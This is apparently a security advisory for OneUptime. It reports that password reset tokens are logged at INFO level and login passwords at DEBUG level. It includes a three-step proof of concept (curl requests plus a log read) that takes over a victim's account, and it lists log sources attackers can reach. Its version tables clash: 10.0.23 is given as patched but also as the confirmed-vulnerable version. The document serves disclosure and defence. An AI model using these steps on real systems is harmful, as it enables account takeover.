The password reset flow logs the complete password reset URL — containing the plaintext reset token — at INFO log level, which is enabled by default in production. Anyone with access to application logs (log aggregation, Docker logs, Kubernetes pod logs) can intercept reset tokens and perform account takeover on any user.
Vulnerable code — App/FeatureSet/Identity/API/Authentication.ts lines 370-371:
logger.info("User forgot password: " + user.email?.toString());
logger.info("Reset Password URL: " + tokenVerifyUrl);
The tokenVerifyUrl is a complete URL like https://app.oneuptime.com/accounts/reset-password/<plaintext-token>. This is logged at INFO level, which is enabled by default in production and persisted to stdout, log files, and any configured log aggregation systems.
Additionally — login credentials logged at DEBUG level (line 909):
logger.debug("Login request data: " + JSON.stringify(req.body, null, 2));
The entire login request body (including cleartext password) is logged at DEBUG level. While DEBUG is typically disabled in production, it is commonly enabled during incident troubleshooting.
No existing CVEs cover sensitive data exposure in logging for OneUptime. CVE-2026-30956 (GHSA-r5v6-2599-9g3m) leaked resetPasswordToken from the database via multi-tenant header bypass — this finding is different (token leaked via application logs).
Environment: OneUptime v10.0.23 via docker compose up (default configuration)
# Step 1 — Trigger forgot-password for target user
curl -s -X POST http://TARGET:8080/api/identity/forgot-password \
-H 'Content-Type: application/json' \
-d '{"data": {"email": "[email protected]"}}'
# Response: {}
# Step 2 — Read application logs to extract the reset token
docker compose logs app --tail 5
# Output:
# app-1 | User forgot password: [email protected]
# app-1 | Reset Password URL: http://localhost/accounts/reset-password/20771cc6-860a-4b9b-bb9c-09eff67de4ef
# Step 3 — Use the extracted token to reset the victim's password
curl -s -X POST http://TARGET:8080/api/identity/reset-password \
-H 'Content-Type: application/json' \
-d '{"data": {"token": "20771cc6-860a-4b9b-bb9c-09eff67de4ef", "password": "NewPassword123!"}}'
Tested and confirmed on 2026-03-12 against oneuptime/app:release (APP_VERSION=10.0.23). Full password reset token 20771cc6-860a-4b9b-bb9c-09eff67de4ef visible in INFO-level logs.
Attack surface for log access: ELK/Elasticsearch dashboards (often misconfigured with default credentials), CloudWatch/Datadog/Splunk/Grafana Loki, docker logs / kubectl logs, shared log volumes, CDN/proxy access logs.
Any user's account can be taken over by anyone with read access to application logs:
| Score | Percentile |
|---|---|
| 0.03% | 9.73% |
| Base score | Version | Severity | Vector |
|---|---|---|---|
| 6.9 | 4.0 | — |
|
| Type | Value |
|---|---|
| GHSA | GHSA-4524-cj9j-g4fj ↗ |
| CVE | CVE-2026-32598 ↗ |
| CWE id | Name |
|---|---|
| CWE-532 | Insertion of Sensitive Information into Log File |
Vulnerable version ranges and first patched releases as published by GitHub.
| Ecosystem | Package | Vulnerable range | First patched | Vulnerable functions |
|---|---|---|---|---|
| npm | oneuptime | < 10.0.23 | 10.0.23 | — |